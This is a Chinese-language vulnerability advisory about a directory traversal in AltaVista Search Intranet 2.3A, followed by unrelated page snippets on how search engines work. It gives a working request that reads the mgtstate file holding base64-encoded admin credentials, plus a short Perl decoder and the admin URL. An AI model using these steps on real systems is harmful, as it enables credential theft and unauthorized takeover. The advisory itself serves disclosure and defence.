受影响系统:
AltaVista Search Intranet 2.3A
描述:
AltaVista Search engine在9000端口开启了一个webserver,用来监听搜索请求.主要的搜索
函数(cgi-bin/query)中有一个模板变量{mss},它将接受搜索请求中的包含的单个"../"字符
串,提供对上一层目录('http')中所有文档的访问权限.
这些文档可能包含很多管理信息,包括用来进行远程管理的用户名和口令.这些用户名和口令
被base-64编码,可以很容易得被恢复成纯文本方式,因此攻击者可以获得远程管理这个搜索引
擎的权力.
< 发现者: rudi carell (rudicarell@HOTMAIL.COM) >
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
通过执行 http://target:9000/cgi-bin/query?../logs/mgtstate
可以获得mgtstate文件的内容,这里面包含有远程管理的用户名和口令.
利用下面的小程序就可以将其解码,得到用户名和口令:
#!/usr/bin/perl
use MIME::Base64;
print decode_base64("$ARGV[0]"), "\n";
然后执行 http://target:9000/cgi-bin/mgt
输入得到的用户名和口令就可以远程管理该搜索引擎
分享到:
相关推荐
这个过程包括三个主要步骤:首先,搜索引擎的爬虫程序遍历互联网,抓取各个网站的页面;其次,这些抓取的页面会被处理并建立索引,以便快速查找;最后,当用户输入查询时,搜索引擎会在索引数据库中进行匹配,并按照...
搜索引擎分为多种类型,包括纯自动化的搜索引擎、人工编辑的目录、以及二者的混合体。文章提到了一些流行的搜索引擎,如Yahoo、Google、Inktomi、AltaVista和AOL Search等,并探讨了它们的特点和工作方式。同时,也...
1. 基于蜘蛛程序的机器人搜索引擎,如AltaVista、Excite、Inktomi、FAST、Lycos、Google以及中国的百度和OpenFind。这类搜索引擎利用自动程序(蜘蛛)遍历Web,抓取网页内容并建立索引,然后根据用户查询返回结果。...
搜索引擎是互联网时代的重要产物,随着信息技术的迅猛发展,特别是互联网的普及与Web技术的进步,海量信息的产生使得信息检索成为了一个亟需解决的问题。搜索引擎作为信息检索的核心工具,不仅方便了用户在庞大的...
1. **第一代:手工的目录形式** - 这一时期的搜索引擎主要是人工编辑的目录,例如Yahoo!早期的形式,用户需浏览预分类的网站目录来找到所需信息。 2. **第二代:基于内容分析** - 开始分析网页内容,尤其是标题和...
搜索引擎的核心组成部分之一是Crawler(网络爬虫),它负责自动地遍历互联网,抓取网页并存储到搜索引擎的数据库中。Crawler的设计涉及到多个关键技术环节,包括URL管理、网页下载、内容解析以及抓取策略。 1. URL...